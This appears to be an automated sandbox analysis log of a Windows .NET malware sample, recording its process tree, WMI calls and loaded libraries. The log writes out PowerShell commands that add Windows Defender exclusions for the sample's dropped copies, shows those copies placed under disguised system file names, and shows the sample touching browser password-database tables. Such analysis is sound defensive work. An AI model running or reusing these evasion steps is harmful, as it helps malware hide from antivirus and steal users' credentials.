                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\TCq2JLUA0X.bat"
                              Source: s5duotgoYD.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: s5duotgoYD.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeFile read: C:\Users\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                              Source: Tzs684hvW4.49.dr, fYndCqG0r1.49.dr, xumrD4OgFL.49.dr, mpxD1ADmWr.49.dr, RrAXcxNFr4.49.dr, wBKrMkWpSW.49.dr, ntNjWhMxD7.49.dr, PSrOWPS5Hg.49.dr, o5OsbWHzyw.49.dr, Sn3W2nJxyf.49.dr, hPnfeGbZUW.49.dr, FP2r13DsCc.49.dr, 2vKFolEJK9.49.dr, xieclsHeHM.49.dr, EHNPFb26nV.49.dr, tANKlu2qTk.49.dr, imCKtO89av.49.dr, SMc6EeBQ3A.49.dr, MCPccexigN.49.dr, fvidO5EBb5.49.dr, ggdRal4OQZ.49.dr, zJz3GZ0Bww.49.dr, jUvhx71Sb8.49.dr, EWWOdovFBp.49.dr, hTuTeeEzD5.49.dr, Iuw1difRUU.49.dr, KMkj7FlQZr.49.dr, Bcy3AgBJG1.49.dr, nyjURLBGAE.49.dr, ufodWiTSVv.49.dr, OUF1m4kxkl.49.dr, 48xXbRpi02.49.dr, Vp2qhV3Hsl.49.dr, JF6PppDecd.49.dr, 4WFD8vwzmv.49.dr, KVCJaEG3iK.49.dr, cAxrBTc2GY.49.dr, 7of1Pi4HGN.49.dr, tpYuBwJhMu.49.dr, CuLCMj9lRH.49.dr, NPRdKOHmNL.49.dr, u0pqMhdtCG.49.dr, w5P9tOjZ4B.49.dr, u1fNVTMfcd.49.dr, RAIjWuSd0z.49.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                              Source: s5duotgoYD.exeReversingLabs: Detection: 65%
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeFile read: C:\Users\user\Desktop\s5duotgoYD.exeJump to behavior
                              Source: unknownProcess created: C:\Users\user\Desktop\s5duotgoYD.exe "C:\Users\user\Desktop\s5duotgoYD.exe"
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ozb03vs1\ozb03vs1.cmdline"
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA9C5.tmp" "c:\Windows\System32\CSC5850B7348A2C4AEC99A5FCDCA9CA019.TMP"
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\RuntimeBroker.exe'
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\ModemLogs\conhost.exe'
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\twain_32\xKVBpkhCEjg.exe'
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe'
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\xKVBpkhCEjg.exe'
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\s5duotgoYD.exe'
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: unknownProcess created: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe "C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe"
                              Source: unknownProcess created: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe "C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe"
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\TCq2JLUA0X.bat"
                              Source: unknownProcess created: C:\Windows\ModemLogs\conhost.exe C:\Windows\ModemLogs\conhost.exe
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess created: C:\Windows\ModemLogs\conhost.exe C:\Windows\ModemLogs\conhost.exe
                              Source: unknownProcess created: C:\Recovery\RuntimeBroker.exe C:\Recovery\RuntimeBroker.exe
                              Source: unknownProcess created: C:\Recovery\RuntimeBroker.exe C:\Recovery\RuntimeBroker.exe
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                              Source: unknownProcess created: C:\Users\user\Desktop\s5duotgoYD.exe C:\Users\user\Desktop\s5duotgoYD.exe
                              Source: unknownProcess created: C:\Users\user\Desktop\s5duotgoYD.exe C:\Users\user\Desktop\s5duotgoYD.exe
                              Source: unknownProcess created: C:\Recovery\xKVBpkhCEjg.exe C:\Recovery\xKVBpkhCEjg.exe
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                              Source: unknownProcess created: C:\Recovery\xKVBpkhCEjg.exe C:\Recovery\xKVBpkhCEjg.exe
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\RuntimeBroker.exe "C:\Recovery\RuntimeBroker.exe"
                              Source: unknownProcess created: C:\Recovery\RuntimeBroker.exe "C:\Recovery\RuntimeBroker.exe"
                              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                              Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: unknownProcess created: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe "C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe"
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ozb03vs1\ozb03vs1.cmdline"Jump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\RuntimeBroker.exe'Jump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\ModemLogs\conhost.exe'Jump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\twain_32\xKVBpkhCEjg.exe'Jump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe'Jump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\xKVBpkhCEjg.exe'Jump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\s5duotgoYD.exe'Jump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\TCq2JLUA0X.bat" Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA9C5.tmp" "c:\Windows\System32\CSC5850B7348A2C4AEC99A5FCDCA9CA019.TMP"Jump to behavior
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\RuntimeBroker.exe "C:\Recovery\RuntimeBroker.exe"
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: ktmw32.dllJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: dlnashext.dllJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: wpdshext.dllJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
